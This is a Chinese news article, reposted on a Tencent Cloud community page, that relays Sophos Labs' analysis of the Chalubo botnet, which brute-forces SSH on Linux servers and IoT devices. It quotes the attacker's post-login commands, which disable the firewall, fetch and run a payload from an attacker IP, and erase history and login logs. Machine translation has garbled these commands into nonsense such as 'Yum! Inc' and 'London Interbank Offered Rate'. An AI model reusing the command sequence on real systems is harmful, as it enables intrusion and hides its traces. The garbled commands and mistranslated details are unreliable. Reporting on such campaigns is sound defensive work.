最新的chalubo僵尸网络攻击,目标是服务器和物联网设备

网络安全公司Sophos的一部分Sophos实验室在周一( 10月22日)发表的博客文章中指出,他们一直在关注9月初开始的网络攻击,目标是打开SSH服务器的Linux服务器。在这次攻击中,攻击者的主要目的是传播一种新的自动化DDoS攻击工具,他们称之为“cha lubo”。

sophos实验室分析显示,攻击者使用Chacha流密码来加密Cha Lubo的主要组件和相应的Lua脚本,而在最新版本中,攻击者采用了更常见的Windows恶意软件原则来防止Cha Lubo检测。保持不变的是,cha lubo的最新版本也包含了xor的代码。DDoS和米拉伊恶意软件家族。

它在八月底开始传播,现在有几个版本

据Sophos Labs称,Cha Lubo在8月下旬开始通过网络感染目标设备,攻击者将通过在被感染的设备上发布命令来检索它。cha Lubo实际上由三部分组成:下载模块、主bot程序(最初只能在x86处理器架构的系统上运行)和Lua命令脚本。

到10月中旬,攻击者开始发布命令来检索elk not dropper (检测为Linux / DDoS - az ),该命令用于提供cha - lub ( cha - Lua - bot )包的其余部分。

此外,有各种版本的BOT程序可以在不同的处理器架构上运行,包括32位和64位ARM、x86、x86 _ 64、MIPS、MIPEL和PowerPC。这可能表明这一网络攻击活动的测试阶段已经结束,也许我们会看到基于cha lubo的攻击数量持续增加。

尝试暴力破解密码并强制登录SSH服务器

sophos实验室称,他们部署的蜜罐系统最初记录了2018年9月6日的攻击。cha Lubo的bot程序将首先尝试暴力破解密码登录ssh服务器。

攻击者一旦获得对目标设备的访问权限,就会发出以下命令:

/ etc / initialization / iptables stop

Service Network Table Stopped

suspend

resuspension 2 stops

Chatt - I / USR / Bucket / Bucket / Bucket

chmod 755 / usr / barrel / barrel / barrel

Yum! Inc

wget - c hxxp : / / 117。21。191。108 : 8694 / libsdes - P / usr / bin /

CHMOD 777 / USR / BIN / London Interbank Offered Rate

nohup / usr / bin / libsdes & amp;燃气轮机;/ dev /空2 & amp;燃气轮机;& amp;安培;1安培;安培;

Export history file = / dev / null

Risk Management - Finance / Risk Value / Log / WTMP

History

虽然攻击很常见,但是攻击者使用分层方法下载恶意组件,加密方法对于Linux恶意软件来说并不常见。

事实上,如果我们仔细观察造成持久攻击的代码段,我们会发现cha lubo从xor中复制了del服务和add服务函数。恶意软件家族。此外,一些代码段被复制到Mirai恶意软件,例如一些随机函数和util _ local _ addr函数的扩展代码。

Sophos实验室提出的一些预防建议和措施

由于cha lubo感染目标系统的主要方法是使用通用用户名和密码组合来猛烈破解ssh服务器的登录凭据,sohos实验室建议ssh服务器系统管理员(包括嵌入式设备)应该更改这些设备上的默认密码。如果可能,系统管理员最好使用SSH密钥而不是登录密码。

此外,像任何其他设备一样,保持系统的最新,及时安装官方修复程序,安装实用的反病毒软件将是良好的主动防御措施。

这篇文章由黑客视野的综合网络组织,图片来源于网络。请指出“来自黑客视觉”,并附上链接。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181024A0I77100?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券